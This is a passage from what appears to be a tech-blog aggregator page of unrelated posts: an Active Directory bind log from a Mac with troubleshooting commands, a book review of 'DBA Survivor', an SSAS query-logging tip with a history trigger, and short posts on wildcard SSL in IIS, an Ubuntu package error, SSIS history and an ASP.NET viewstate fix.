14:19:13.222825 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 15 2013-10-25 14:19:13.222840 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using ENC-TS with enctype 18 2013-10-25 14:19:13.222850 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using default_s2k_func 2013-10-25 14:19:13.227443 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - fast disabled, not doing any fast wrapping 2013-10-25 14:19:13.227502 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 0 2013-10-25 14:19:13.228233 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.228320 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.228374 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.229930 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.229957 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.229975 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto trying over again (reset): 0 2013-10-25 14:19:13.230023 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 2 2013-10-25 14:19:13.230664 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.230726 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.230818 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to 11: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.231101 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.232743 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.232777 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.232798 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 2 packets 2 wc: 0.005316 nr: 0.000000 kh: 0.001339 tid: 00010002 2013-10-25 14:19:13.232856 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: loop 3 2013-10-25 14:19:13.232868 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - 
krb5_credential - krb5_get_init_creds: processing input 2013-10-25 14:19:13.232900 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using keyproc 2013-10-25 14:19:13.232910 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using default_s2k_func 2013-10-25 14:19:13.236487 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: extracting ticket 2013-10-25 14:19:13.236557 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: wc: 0.015944 2013-10-25 14:19:13.237022 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 2 2013-10-25 14:19:13.237444 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.237482 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.237551 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to 11: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.237900 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.238616 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.238645 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.238674 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 1 packets 1 wc: 0.001656 nr: 0.000000 kh: 0.000409 tid: 00020001 2013-10-25 14:19:13.238839 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 2 2013-10-25 14:19:13.239302 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.239360 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.239429 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to 11: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.239683 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.240350 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.240387 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.240415 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 1 
packets 1 wc: 0.001578 nr: 0.000000 kh: 0.000445 tid: 00030001 2013-10-25 14:19:13.240514 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_credentials_with_flags: DOMAIN.COM wc: 0.003615 2013-10-25 14:19:13.240537 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - valid credentials for [email protected] 2013-10-25 14:19:13.240541 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching to cache 'MEMORY:0x7fa713635470' 2013-10-25 14:19:13.240545 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching GSS to cache 'MEMORY:0x7fa713635470 2013-10-25 14:19:13.240555 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Bind Step 5 - Bind/Join computer to domain - 'domain.com' 2013-10-25 14:19:13.241345 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - resolving 'server.domain.com' 2013-10-25 14:19:13.241646 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - added socket 12 for host 'server.domain.com:389' address '192.168.0.2' to kqueue list 2013-10-25 14:19:13.241930 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Setting kerberos server for 'Kerberos:DOMAIN.COM' to 'server.domain.com' 2013-10-25 14:19:13.241962 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching to cache 'MEMORY:0x7fa713635470' 2013-10-25 14:19:13.241969 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching GSS to cache 'MEMORY:0x7fa713635470 2013-10-25 14:19:13.242231 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Confidentiality 2013-10-25 14:19:13.242234 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - setting realm 'DOMAIN.COM' for node '/Active Directory/domain.com' 2013-10-25 14:19:13.242239 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Integrity (signing) 2013-10-25 14:19:13.242274 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using hostname 'server.domain.com' 2013-10-25 14:19:13.242282 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using initiator credential '[email protected]' 2013-10-25 14:19:13.250771 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Authenticate to LDAP using Kerberos credential - 0 2013-10-25 14:19:13.250784 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - verified connectivity to '192.168.0.2' with socket 12 2013-10-25 14:19:13.251513 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - locating site using domain domain.com using CLDAP 2013-10-25 14:19:13.252145 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - using site of 'DOMAINGROUP' from CLDAP 2013-10-25 14:19:13.253626 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - resolving 'server2.domain.com' 2013-10-25 14:19:13.253933 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - added socket 13 for host 'server2.domain.com:389' address '192.168.0.1' to kqueue list 2013-10-25 14:19:13.254428 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Setting kerberos server for 'Kerberos:DOMAIN.COM' to 'server2.domain.com' 2013-10-25 14:19:13.254462 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching to cache 'MEMORY:0x7fa713635470' 2013-10-25 14:19:13.254468 PDT - 10544.20463, Node: /Active 
Directory, Module: ActiveDirectory - switching GSS to cache 'MEMORY:0x7fa713635470 2013-10-25 14:19:13.254617 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - setting realm 'DOMAIN.COM' for node '/Active Directory/domain.com' 2013-10-25 14:19:13.254661 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Confidentiality 2013-10-25 14:19:13.254670 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Integrity (signing) 2013-10-25 14:19:13.254689 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using hostname 'server2.domain.com' 2013-10-25 14:19:13.254695 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using initiator credential '[email protected]' 2013-10-25 14:19:13.262092 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Authenticate to LDAP using Kerberos credential - 0 2013-10-25 14:19:13.262108 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - verified connectivity to '192.168.0.1' with socket 13 2013-10-25 14:19:13.262982 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Computer account either already exists or DC is already Read/Write 2013-10-25 14:19:13.264968 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Adding record 'cn=spike,CN=Computers,DC=domain,DC=com' in 'domain.com' The failure point seems to be Computer account either already exists or DC is already Read/Write, however, I can search for 'spike' on the Active Directory server using Active Directory Explorer and it's not there. If I do the same search for the Linux and Windows PCs I added previously, I can find them.
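    When the Directory Utility GUI fails like this, attempting the same bind from the command line can surface a more specific error than code 5202. This is only a diagnostic sketch with placeholder values (domain, admin account and OU are assumptions); check man dsconfigad for the exact flags on 10.9:

        # Attempt the bind from Terminal on the Mavericks client (placeholder values)
        sudo dsconfigad -add domain.com -username Administrator -ou "CN=Computers,DC=domain,DC=com" -force

        # If a stale binding on the client is suspected, remove it first and retry the add
        sudo dsconfigad -remove -force -username Administrator

    If the command-line bind reports the same "already exists or DC is already Read/Write" condition, having a domain admin delete (or pre-create) the computer object for 'spike' and then retrying the bind is a reasonable next step.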

    Read the article

  • SQLAuthority Book Review – DBA Survivor: Become a Rock Star DBA

    - by pinaldave
    DBA Survivor: Become a Rock Star DBA – Thomas LaRock Link to Amazon Link to Flipkart First of all, I thank all my readers: when I wrote that I could not get this book in any local book store, they offered to send me a copy of this good book. A very special mention goes to Sripada and Jayesh, who went to so much effort to find my home address and send me the hard copy. Before, I did not have a copy of the book, but now I already have two! It surprises me how my readers were able to find my home address, which I have not publicly shared. Quick Review: This is indeed an easy-to-read and fun book. We all work day and night with technology, yet we should not forget to show our love and care for our family at home. For our souls that starve for peace and guidance, this one book is the "it" book for all technology enthusiasts. Though this book was specifically written for DBAs, its reach is not limited to DBAs, because the lessons incorporated in it actually apply to all. This is one of the most motivating technical books I have read. Detailed Review: Let us go over a few questions first: Who wants to be as famous as a rockstar in the field of Database Administration? How can one learn what it takes to become a top-notch software developer? If you are a beginner in your field, how will you get to the next level? Your boss may be very kind or like Dilbert's Boss – what will you do? How do you keep growing when the ecosystem around you does not support you? You are almost at the top but there is someone else at the TOP – what do you do, and how do you avoid office politics? As a database developer, what should be your basic responsibility? And many more… I was able to read the book completely in one sitting, and I loved it. Before I continue with my opinion, I want to echo the opinion of Kevin Kline, who has written the Foreword of the book. He has truly suggested that "You hold in your hands a collection of insights and wisdom on the topic of database administration gained through many years of hard-won experience, long nights of study, and direct mentorship under some of the industry's most talented database professionals and information technology (IT) experts." Today, the IT field is getting bigger and better, and talking about terabytes of database becomes "more" normal every single day. The gods and demigods of database professionals are taking care of these large-scale databases and carefully maintaining them. In this world, there are also many who are just taking the first step. There are many experts in different technology fields who are asked to address issues with databases, and there are YOU and ME, who are just new to this work. So we ask ourselves WHERE to begin and HOW to begin. We adore and follow the religion of our rockstars, but oftentimes we really have no idea about their background and their struggles. Every rockstar has a success story which needs to be digested before learning his tricks and tips. This book starts on the same note and teaches the two most important lessons for anybody who wants to be a DBA Rockstar – to focus on the single goal of learning and to excel at the technology. The story starts with three simple guidelines – Get Prepared, Get Trained, Get Certified. Once a person learns the skills, it is about time to enrich and improve them. I am sure that the right opportunities will then come find them, and they will not have to run after them.
However, the real challenge for any person is the first day or first week. A new employee, no matter how experienced he is, sometimes has no clue about what to do at a new job. Chapters 2 and 3 talk precisely about what one should do as soon as the new job begins. They are also written keeping in focus the fact that each job can be very different, but a few infrastructure setups and programming concepts stay the same. Learning the basics of the database was really interesting. I like to focus on the roots of any technology. It is important to understand the structure of the database before suggesting what indexes need to be created, and in the same way this book covers the most essential knowledge that most database developers must learn. I think the title of the fourth chapter is my favorite sentence in this book. I can see that I will be saying this again and again in the future – "A Development Server Is a Production Server to a Developer". I have worked in the software industry for almost 8 years now, and I have seen so many developers sitting in their chairs and waiting for instructions from their lead about how to improve the code or what to do next. When I talk to them, I suggest that they experiment with their server and try various techniques. I think they all should understand that, for them, a development server is their production server, and they need to pay proper attention to the code from the beginning. There should be NO inappropriate code from the beginning. One has to fully focus and give their best; if they are not sure, they should ask, but they should do something and stay active. Chapters 5 and 6 talk about two essential skills for any developer and database administrator – the ethics of developers when they are working with a production server, and how to support software which is running on the production server. I have met many people who know the theory by heart, but when put in front of the keyboard they do not know where to start. The first thing they do is open the browser and search online, instead of opening SQL Server Management Studio. This can very well happen to anybody who is experienced as well. Chapters 5 and 6 address that situation and also include handy scripts which can solve almost all the basic troubleshooting issues. "Where's the Buffet?" By far, this is the best chapter in this book. If you have ever met me, you would know that I love food. After reading this chapter, I felt Thomas had written it just keeping me in mind. I think there will be many other people who feel the same way, too. Even my wife, who read this chapter, thought it was specifically written for me. I will not talk any more about this chapter, as this is one must-read chapter. And of course, this is about real 'FOOD'. I am an SQL Server Trainer and Consultant, and I totally agree with the point made in chapter 8 of this book. Yes, it says that it is necessary to train employees and people. Millions of dollars' worth of labor is continuously done in the world that is faulty and incorrect. Once something goes wrong, a very expensive consultant comes in and fixes the problem. This whole cycle can be stopped and improved if proper training is done. There is plenty of free training available as well, if one cannot afford paid training. "Connect. Learn. Share" – I think this is a great summary and bird's-eye view of this book. Networking is the key.
Everything discussed in this book can be taken to the next level if one properly uses these tips and continuously grows with them. Connecting with others, helping each other learn, and building a good knowledge-sharing environment should be the goal of everyone. Before I end the review, I want to share a real experience. I have personally met one DBA who had worked in a single department of a company for so long that, when that department was closed and he was put in a different department of the same company, he could not adjust and quit the job, despite having the same people and company around him. Adjusting to a new environment gets much tougher as a person gets more and more experienced. This book precisely addresses this issue along with its solutions. I just cannot stop comparing the book with my personal journey. I found that so many things in the book are, coincidentally, written just the way we developers and DBAs think. I must express special thanks to Thomas for taking time out of his personal life to write this book for us. This book is indeed a book for everybody who wants to grow healthily in a tough and competitive environment. Reference: Pinal Dave (http://blog.SQLAuthority.com) Filed under: Pinal Dave, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, SQLAuthority Book Review, SQLAuthority News, SQLServer, T SQL, Technology

    Read the article

  • Query Logging in Analysis Services

    - by MikeD
    On a project I work on, we capture the queries that get executed on our Analysis Services instance (SQL Server 2008 R2) and use the table for helping us to build aggregations and also we aggregate the query log daily into a data warehouse of operational data so we can track usage of our Analysis databases by users over time. We've learned a couple of helpful things about this logging that I'd like to share here. First off, the query log table automatically gets cleaned out by SSAS under a few conditions - schema changes to the analysis database and even regular data and aggregation processing can delete rows in the table. We like to keep these logs longer than that, so we have a trigger on the table that copies all rows into another table with the same structure. Here is our trigger code: CREATE TRIGGER [dbo].[SaveQueryLog] on [dbo].[OlapQueryLog] AFTER INSERT AS INSERT INTO dbo.[OlapQueryLog_History] (MSOLAP_Database, MSOLAP_ObjectPath, MSOLAP_User, Dataset, StartTime, Duration) SELECT MSOLAP_Database, MSOLAP_ObjectPath, MSOLAP_User, Dataset, StartTime, Duration FROM inserted Second, the query logging process is "best effort" - if SSAS cannot connect to the database listed in the QueryLogConnectionString in the Analysis Server properties, it just stops logging - it doesn't generate any errors to the client at all, which is a good thing. Once it stops logging, it doesn't retry later - an hour, a day, a week, or even a month later, so long as the service doesn't restart. That has burned us a couple of times, when we have made changes to the service account that is used for SSAS, and that account doesn't have access to the database we want to log to. The last time this happened, we noticed a while later that no logging was taking place, and I determined that the service account didn't have sufficient permissions, so I made the necessary changes to give that service account access to the logging database. I first tried just the db_datawriter role and that wasn't enough, so I granted the service account membership in the db_owner role. Yes, that's a much bigger set of permissions, but I didn't want to search out the specific permissions at the time. Once I determined that the service account had the appropriate permissions, I wanted to get query logging restarted from SSAS, and I wondered how to do that. Having just used a larger hammer than necessary with the db_owner role membership, I considered just restarting SSAS to get it logging again. However, this was a production server, and it was in the middle of business hours, and there were active users connecting to that SSAS instance, so I thought better of it. As I considered the options, I remembered that the first time I set up query logging, by putting in a valid connection string to the QueryLogConnectionString server property, logging started immediately after I saved the properties. I wondered if I could make some other change to the connection string so that the query logging would start again without restarting the service. I went into the connection string dialog, went to the All page, and looked at the properties I could change that wouldn't affect the actual connection. Aha! The Application Name property would do just nicely - I set it to "SSAS Query Logging" (it was previously blank) and saved the changes to the server properties. And the query logging started up right away.
If I need to get this running again in the future, I could just make a small change in the Application Name property again, save it, and even change it back again if I wanted to. The other nice side effect of setting the Application Name property is that now I can see (and possibly filter for or filter out) the SQL activity in that database that is related to the query logging process in Profiler. To sum up: The SSAS Query Logging process will automatically delete rows from the QueryLog table, so if you want to keep them longer, put a trigger on the table to copy the rows to another table. The SSAS service account requires more than db_datawriter role membership (and probably less than db_owner) in the database specified in the QueryLogConnectionString server property to successfully insert log rows to the QueryLog table. Query logging will stop quietly whenever it encounters an error. Make a change to the QueryLogConnectionString server property (such as the Application Name attribute) to get query logging to restart and you won't have to restart the service.
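    As a small illustration of the daily roll-up mentioned at the start of the post, a query along these lines could be run against the history table populated by the trigger (column names are the ones used in the trigger; Duration is assumed to be in milliseconds):

        SELECT CONVERT(date, StartTime) AS QueryDate,
               MSOLAP_Database,
               MSOLAP_User,
               COUNT(*)      AS QueryCount,
               AVG(Duration) AS AvgDurationMs
        FROM dbo.OlapQueryLog_History
        GROUP BY CONVERT(date, StartTime), MSOLAP_Database, MSOLAP_User
        ORDER BY QueryDate, MSOLAP_Database, MSOLAP_User;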

    Read the article

  • Using Wildcard SSL Certificates on IIS 7

    - by The Official Microsoft IIS Site
    The other day I was helping someone who was trying to configure a wildcard certificate on their Windows Cloud Server. Their server was running Windows Server 2008 R2 with IIS 7. They were technically savvy and knew how to configure sites on their own and install a regular SSL certificate, but they were stuck trying to get a wildcard certificate configured properly. They had quite a few sites configured using subdomains such as support.domain.com, mail.domain.com, login.domain.com, etc. To tighten...(read more)
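    The usual sticking point is that the IIS 7 binding dialog tends to grey out the Host name box for HTTPS bindings, so the per-subdomain bindings often have to be added with appcmd instead. A hedged sketch (site names and host headers below are placeholders, not from the original post; appcmd lives in %windir%\system32\inetsrv):

        appcmd set site /site.name:"Support" /+bindings.[protocol='https',bindingInformation='*:443:support.domain.com']
        appcmd set site /site.name:"Mail" /+bindings.[protocol='https',bindingInformation='*:443:mail.domain.com']

    With a single *.domain.com certificate bound on the shared IP and port 443, the host header in each binding is what lets IIS route requests to the right site.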

    Read the article

  • Cannot install any software from the Software Center due to ttf-mscorefonts-installer package error

    - by Dei
    When I try to install any software from the Ubuntu Software Center, it fails with this error: An unhandled error occured There seems to be a programming error in aptdaemon. This is the software that allows you to install/remove software and to perform other package management related tasks. details Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/aptdaemon/worker.py", line 961, in simulate trans.unauthenticated = self._simulate_helper(trans) File "/usr/lib/python2.7/dist-packages/aptdaemon/worker.py", line 1085, in _simulate_helper return depends, self._cache.required_download, \ File "/usr/lib/python2.7/dist-packages/apt/cache.py", line 226, in required_download pm.get_archives(fetcher, self._list, self._records) SystemError: E:I wasn't able to locate file for the ttf-mscorefonts-installer package. This might mean you need to manually fix this package. Please help me!
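    A common recovery sequence for this kind of aptdaemon/apt failure (no guarantee it applies here, but low-risk to try) is to refresh the package lists and reinstall the offending package from a terminal:

        sudo apt-get clean
        sudo apt-get update
        sudo apt-get install --reinstall ttf-mscorefonts-installer
        sudo apt-get -f install

    If the reinstall succeeds, the Software Center should stop tripping over the missing ttf-mscorefonts-installer file on subsequent installs.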

    Read the article

  • SSIS Prehistory video

    - by jamiet
    I’m currently wasting spending my Easter bank holiday putting together my presentation SSIS Dataflow Performance Tuning for the upcoming SQL Bits conference in London and in doing so I’m researching some old material about how the dataflow actually works. Boring as it is I’ve gotten easily sidelined and have chanced upon an old video on Channel 9 entitled Euan Garden - Tour of SQL Server Team (part I). Euan is a former member of the SQL Server team and in this series of videos he walks the halls of the SQL Server building on Microsoft’s Redmond campus talking to some of the various protagonists and in this one he happens upon the SQL Server Integration Services team. The video was shot in 2004 so this is a fascinating (to me anyway) glimpse into the development of SSIS from before it was ever shipped and if you’re a geek like me you’ll really enjoy this behind-the-scenes look into how and why the product was architected. The video is also notable for the presence of the cameraman – none other than the now-rather-more-famous-than-he-was-then Robert Scoble. See it at http://channel9.msdn.com/posts/TheChannel9Team/Euan-Garden-Tour-of-SQL-Server-Team-part-I/ Enjoy! @Jamiet Share this post: email it! | bookmark it! | digg it! | reddit! | kick it! | live it!

    Read the article

  • Clarity of the cloud with Microsoft Learning Experience.

    - by Testas
    While waiting for the Super Bowl, I thought I would write this… 2014 will see not only the release of a new version of SQL Server but also, accompanying it, the release of courses and certification tracks from Microsoft Learning Experience – formerly Microsoft Learning – that will support education on SQL Server and related technologies. The notable addition to the curriculum is substantial material on cloud and big data features that pertain to data and business intelligence. There are entire modules/chapters dedicated to Power BI, SQL Azure and HDInsight. Certifications and courses from Microsoft can get stick – sometimes fairly and sometimes unfairly – and whilst I am a massive advocate of community as a way to get information and education, Microsoft's new courses will bring clarity to the burning topics of the moment and help you to understand the capabilities of Power BI and HDInsight. From a business intelligence perspective there will be three courses: 20463C: Data Warehousing in SQL Server 2014; 20466C: Data Models and Reports in SQL Server 2014; 20467A: Designing Self-Service Business Intelligence and Big Data Solutions. These are not the exact titles of the courses, but they will be confirmed prior to release. And if you have already completed the SQL Server 2012 or 2008 curriculum, there is an upgrade course, 10977A: Upgrading Business Intelligence Skills from 2008 to 2014. Again, this is not the exact title, but these should give you an idea. Look out for announcements from Microsoft Learning Experience….   CHRIS

    Read the article

  • How to generate customized sudoers files in puppet depending on the environment they're deployed to?

    - by gozu
    The sysadmins are present in the sudoers files of all environments, but other sudoers are not. Different environments all have slightly different sudoers. Most of the time, 90% of the users are the same and 10% vary, so we cannot have only one sudoers file for everything. Right now, we are using puppet with 10 different files with names like sudoers.production1, sudoers.production2, sudoers.production3, sudoers.testing1, sudoers.staging1 and so forth. Puppet then picks the file to deploy based on the server's $domain (ex: dbserver.staging1.acme.com) or $hardwaremodel. It works fine, but it's a nightmare to maintain so many files. I'd like to autogenerate sudoers files based on the server's domain and have only one big file with all the sudoers permissions for all users and all environments. Something that looks like: User_Alias ADMINS = abe, bob, carol, dave case $domain { "staging1.acme.com" { #add dev1,dev2,tester1,tester2 to sudoers file } "testing2.acme.com" { #add tester1, tester3, tester4 to sudoers file } } What's the best way to go about this? Suggestions for alternatives are welcome. I'd appreciate any tips. Update 1: For security reasons, we'd rather not concatenate a bunch of files from a folder located on a puppet client in case someone puts a file in there (maliciously or not) and either breaks the combined file or inserts something in it. Most importantly, for usability, we'd like to keep the number of sudoers-related files (fragment or complete) on the puppet server to either 3 (prod/stage/test) or preferably 1 file. This file would (somehow) generate sudoers files on the puppet server and send one customized file to each puppet client. The purpose of this would be to search for a username in a single file only and remove it quicker than doing it on 11 files. When adding a user to a bunch of environments, it won't be as quick, but only one file would need to be opened and looked at, greatly reducing the chances of an omission. Our Sudo version is 1.6.9p8, so we can't use the sudoers.d folder, only a sudoers file.
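    One way to keep a single source of truth is to hold the user lists in one manifest and render the finished sudoers file from a template on the puppet master, so each client only ever receives its own complete file and nothing is concatenated on the client. A rough sketch with made-up module and user names (the ERB variable syntax assumes a Puppet release recent enough for @-prefixed variables; older releases use bare names or scope.lookupvar):

        # sudo/manifests/init.pp -- per-environment extras chosen from $domain
        class sudo {
          $admins = ['abe', 'bob', 'carol', 'dave']

          case $domain {
            'staging1.acme.com': { $extra_sudoers = ['dev1', 'dev2', 'tester1', 'tester2'] }
            'testing2.acme.com': { $extra_sudoers = ['tester1', 'tester3', 'tester4'] }
            default:             { $extra_sudoers = [] }
          }

          file { '/etc/sudoers':
            owner   => 'root',
            group   => 'root',
            mode    => '0440',
            content => template('sudo/sudoers.erb'),
          }
        }

        # sudo/templates/sudoers.erb -- rendered on the master, shipped as one file
        # Defaults and other static sudoers lines go here
        User_Alias ADMINS = <%= (@admins + @extra_sudoers).sort.uniq.join(', ') %>
        ADMINS ALL=(ALL) ALL

    Because the file is generated during catalog compilation from one manifest and one template, removing a user means editing a single place, and adding someone to several environments is still a change to just that one manifest.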

    Read the article

  • SQLServerCentral Webinar Series #6: Gathering and Interpreting Server Metrics including SQL Monitor

    In this webinar, MVP and noted author, Grant Fritchey shows you how to better keep track of what is happening on your instances by gathering information on performance from SQL Monitor and then using that to interpret the impact on your databases. Dec 14, 2010.

    Read the article

  • Failed to load viewstate.The control tree into which viewstate is being loaded...etc

    - by alaa9jo
    Two days ago, a colleague of mine tried to publish an ASP.NET website (which is built in VS2008 using framework 3.5) to our server. He configured everything in IIS (he made sure that the selected ASP.NET version is 2.0) and launched the website. At first it was working great, but when he tried to click on a specific treeview... BOOM: "Failed to load viewstate. The control tree into which viewstate is being loaded must match the control tree that was used to save viewstate during the previous request. For example, when adding controls dynamically, the controls added during a post-back must match the type and position of the controls added during the initial request." On that page there were these controls: a TreeView and a Placeholder; when the user selects any node, its controls will be created dynamically into that placeholder. The first time it works fine, but when (s)he selects another node, that issue appears. He called me to help him with this issue; for me this was the first time I had seen such an issue. I scratched my head, then decided to eliminate the possibilities one by one. On the development machine it's working perfectly; he published the website to the local IIS and again it's working perfectly; I took a copy of the website and published it on my laptop with no issues at all, so this means that it's not an issue in the code. So there is something missing/wrong on our server [it has Windows Server 2003]. We went to the server and checked the web.config and the configuration in IIS... nothing wrong so far, so I decided to check whether framework 3.5 was installed or not, and the answer: it wasn't installed. Of course he assumed that it was installed, and there was nothing to tell if it wasn't from the "ASP.Net version" in IIS, because frameworks 3.0 and 3.5 will not be listed there [2.0 will be listed there instead]. The only way to check if it was installed or not is to search for the framework in this path: [WINDOWS Folder]\Microsoft.NET\Framework or check if it was installed in Add or Remove Programs. The obvious solution for his case: we installed Framework 3.5 SP1 on our server, restarted the machine, and it worked! If anyone has faced the same issue and solved it with the same solution or a different one, please post it here to share the experience.
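    As a quick sanity check on any other server, the installed framework versions can be listed without clicking through Add or Remove Programs; the paths below are the standard locations, though the exact registry value names can vary by service pack:

        rem List the framework folders (a v3.5 folder only appears here if it is installed)
        dir %windir%\Microsoft.NET\Framework

        rem Query the registry location for installed .NET versions
        reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s /v Version

    Seeing no v3.5 entry in either place is the same tell-tale the author ran into, and installing .NET Framework 3.5 SP1 is the fix.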

    Read the article

  • Implementing User-Defined Hierarchies in SQL Server Analysis Services

